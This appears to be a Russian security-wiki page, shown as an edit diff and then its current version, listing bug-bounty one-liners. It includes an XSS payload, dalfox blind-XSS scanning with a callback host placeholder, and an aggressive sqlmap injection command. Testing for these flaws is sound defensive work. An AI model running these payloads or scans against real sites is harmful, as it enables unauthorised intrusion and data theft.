Bugbounty — различия между версиями

Материал из InformationSecurity WIKI
Перейти к: навигация, поиск
(Новая страница: «На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уя…»)
 
м
 
(не показаны 2 промежуточные версии этого же участника)
Строка 1: Строка 1:
 
На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости
 
На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости
  
 +
= Уязвимости =
  
 +
== XSS ==
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq
 +
 +
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
 +
 +
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
 +
 +
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
  
echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq
+
</syntaxhighlight>
 +
 
 +
== SQL injection ==
 +
 
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
python sqlmap.py -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3
 +
</syntaxhighlight>
 +
 
 +
== Backups ==
 +
 
 +
 
 +
= Ссылки =
 +
 
 +
https://github.com/dwisiswant0/awesome-oneliner-bugbounty

Текущая версия на 12:13, 20 марта 2022

На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости

Уязвимости

XSS

echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt

waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

SQL injection

python sqlmap.py -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3

Backups

Ссылки

https://github.com/dwisiswant0/awesome-oneliner-bugbounty